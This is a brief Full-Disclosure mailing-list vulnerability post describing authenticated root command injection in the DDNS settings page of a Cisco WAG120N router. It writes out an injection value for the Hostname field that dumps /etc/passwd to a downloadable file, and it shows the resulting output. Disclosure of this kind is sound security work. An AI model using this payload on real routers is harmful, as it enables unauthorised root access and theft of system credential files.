Hello, here you have a quick POC in three simple steps # Remote Command Execution on Cisco WAG120N. # (Not tested in other routers) # # Manuel Fernández Fernández ([email protected]) # # Greetings to 2x1 crew (Alberto, Dani, Luis, Juanmi, Juanito & oca)
1º Authenticate and browse to /setup.cgi?next_file=Setup_DDNS.htm 2º All the fields you see are vulnerables to command execution as root, so inject "qwe.com;cat /etc/passwd> /www/Routercfg.cfg;" into the Hostname field 3º Everything is done, just download the file /Routercfg.cfg (Authenticated is requiered) root::0:0:root:/:/bin/sh nobody::99:99:Nobody:/:/sbin/sh -- Manuel Fernández
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
